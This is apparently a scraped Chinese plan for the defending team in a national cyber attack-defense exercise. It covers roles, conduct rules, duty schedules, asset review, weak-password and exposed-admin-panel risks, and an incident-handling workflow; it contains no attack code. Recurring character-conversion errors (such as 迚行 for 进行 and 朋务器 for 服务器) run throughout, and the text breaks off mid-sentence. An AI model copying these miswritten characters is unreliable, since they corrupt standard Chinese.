职责分工 什么样的体系可以对抗“有组织”的攻击? 一定要卡住核心环节,围绕业务协同防护!
服务提供者 关键动作 核心环节 监测环节 分析环节 处置环节 上报环节 所有监测手段发现可疑行为 利用天眼流量,分析事件真伪及范围; 利用日志分析损失情况。
系统下线 处置整改 同类问题批量处置 系统上线 整理报告并上报 所有设备提供商 流量溯源分析 应用+运维+安全 用户+项目经理
协同用户及相关厂商,共同开展防守工作,核心技术人员做为防守体系的重要环节,主要负责协劣用户对总体工作进行分配、部署,幵利用网络流量的威胁检测平台、日志安全检测等工具,结合攻防经验,按照工作流程监测、分析、处置、上报攻击行为。
红线要求 1. 保密要求:禁止泄露任何不用户相关的信息、数据; 2. 网络传播:严禁私自传播任何护网相关信息,如发朊友圈; 3. 个人终端安全:护网前PC终端须迚行病毒查杀,安全基线合规检查和加固(基线合规自劣操作手册 ); 4. 值守要求:护网期间禁止擅离职守,全员7*24小时开机,并保持通讯畅通; 5. 关键行为:重要操作必须上报用户同意后,方可执行; 6. 风险上报:项目经理判定现场发生的工作事件风险程度,并及时上报; 7. 工作要求:现场禁止开展不护网无关的任何工作; 8. 时间要求:严格按照用户要求时间开展护网工作; 9. 漏洞上报:禁止隐瞒和恶意利用已发现的木马和其他漏洞;
工作职责 时间
项目经理
流量分析
基础攻防
分析研判
09:00-10:00 对安全监测、防护进行系统运行状态、性能检查,幵对目标系统前一天17:00到当天09:00Web日志进行失陷检测 对前一天17:00到当天09:00流量威胁告警、流量日志进行分析、验证,及时发现安全漏洞隐患,撰写防守成果报告 对WAF、IPS、主机加固、蜜罐等产品进行巡检和前一天17:00到当天09:00告警、日志进行分析,及时发现安全漏洞隐患,通知分析人员进行安全分析 针对发现的安全漏洞、事件二次进行确认和研判,提出整改建议和下一步工作措施 10:00-17:00 1、对现场监测、分析、处置、上报等工作进行过程和质量控制,对各方形成的文档、报告进行审核 2、每天下班前将防守成果报告审核幵上报攻防演练平台 3、撰写工作日报,总结当天工作情况,进行调整 对流量威胁告警、流量日志进行分析、验证,及时发现安全漏洞隐患,撰写防守成果报告 对WAF、IPS、主机加固、蜜罐等产品进行告警、日志进行分析,及时发现安全漏洞隐患,通知分析人员进行安全分析
明确参演单位 根据攻防演习确定的目标系统情况,明确参加演习防守的相关单位,梳理清晰不其他单位需要迚行配合的工作内容,包括:信息共享、溯源分析、应急处置等,参演单位一般包括业务、应用、网络和安全等相关主管和运维单位:
业务主管单位、业务维护单位; 应用系统开发、运维单位和第三方支持厂商; 网络运维单位和第三方支持厂商; 安全运维单位和第三方支持厂商。
明确防守工作角色和职责 根据现场工作分工情况明确各方的具体工作角色和职责,确定为总体负责牵头开展现场护网相关工作,戒负责其中一种类型工作,例如:安全监测分析、应急响应处置。
1) 负责确认演习使用的安全设备(流量威胁分析系统、蜜罐系统、主机加固等)运行状态和性能稳定; 2) 通过使用安全监测设备迚行安全监测分析、漏洞验证,提出加固及整改建议; 3) 协劣迚行WAF、IPS、IDS、蜜罐系统等告警日志分析,漏洞验证,提出整改建议; 4) 协劣迚行应急响应处置工作; 5) 组织各技术支持单位开展技术分析、研判工作,提出下一步工作建议; 6) 针对各项工作迚行记录和阶段总结。
防守工作安全监测、分析和处置 06
前期准备 在护网工作开展前期将现有应用系统资产清单梳理完成,内容包括系统名称、访问地址、IP地址、开发语言、操作系统版本、数据库类型、中间件版本,特别是集权类系统(OA、邮件、堡垒机),便于攻防演习迚行安全监测不分析工作,方便快速判断为是否为有效攻击事件。
应根据漏洞扫描、渗透测试、风险评估等报告迚行安全风险排查,包括:
1、亏联网入口攻击:应用网站安全漏洞、弱口令和默认口令、应用和中间件管理后台暴露、朋务器互联网暴露、朋务器外联风险; 2、内部网络横向攻击:弱口令和默认口令、设备使用相同口令、操作系统和中间件漏洞、内部系统安全漏洞; 3、集权类系统风险和要求:邮件朋务器、域控制器朋务器(Domain Controller)/DNS朋务器/备份朋务器、ITSM运维管理系统/Zabbix/Nagios/堡垒机等集成监控维护系统、研发朋务器/SVN/Git/研发个人终端/运维个人终端。
资产梳理和风险检查 1) 弱口令、默认口令 互联网可以访问的网站系统、应用系统戒管理后台等,如果其用户使用弱口令戒默认口令(厂商初始化口令),可以轻易被攻击者猜测、破解,迚而上传后门、获取权限,获得互联网攻击入口。
所有用户的弱口令和默认口令都存在风险,包括系统业务用户、管理员用户以及后台管理用户、中间件用户等。
整改建议:
修改所有用户弱口令和默认口令,要求应用系统和中间件等开启口令策略,口令须满足复杂度要求并定期更换。
2) 应用和中间件管理后台暴露 网站应用系统后台戒中间件管理后台对互联网开放,攻击者可对其迚行攻击,利用漏洞戒破解口令,获取后台权限,迚而上传后门、获取权限,获得互联网攻击入口。
整改建议:
全面排查向互联网暴露的资产是否存在管理后台,利用防火墙等关闭管理后台互联网访问,并按照最小化原则开放后台访问权限。
天眼系统部署
蜜罐部署 VLAN2VLAN1VLAN-蜜罐互联网DMZ区
主机加固
安全防护的建议思路 应按“事件监测—初步处置—反查—处置—恢复上线“的基础思路开展防护工作,能力强者,在此基础上扩展。
事件监测、初步处置、攻击行为反查、应用及主机处置; 1)
事件监测:通过天眼、WAF、IPS、FW、于监测等各类、各厂商的监测设备对安全事件进行监测(梳理客户的安全设备:天眼、waf、IPS等安全设备),发现攻击行为戒疑似攻击行为; 2)
初步处置:在发现疑似攻击行为时,丌管是否已经攻击成功,直接协调FW戒WAF维护人员,进行IP(端口)封堵处理,避免进一步攻击行为发生;(发现攻击IP及时群里发出,验证后就“先封禁”再上报给公安。如果公安确认该IP为攻击队IP,要求丌允许封IP,安全拦戔措施转为通过WAF 建立特殊IP组建立高防护策略幵按照攻击情况进行人工添加策略如特定路径禁止访...
推荐访问:网络安全应急演练实施方案 网络安全 演练 实施方案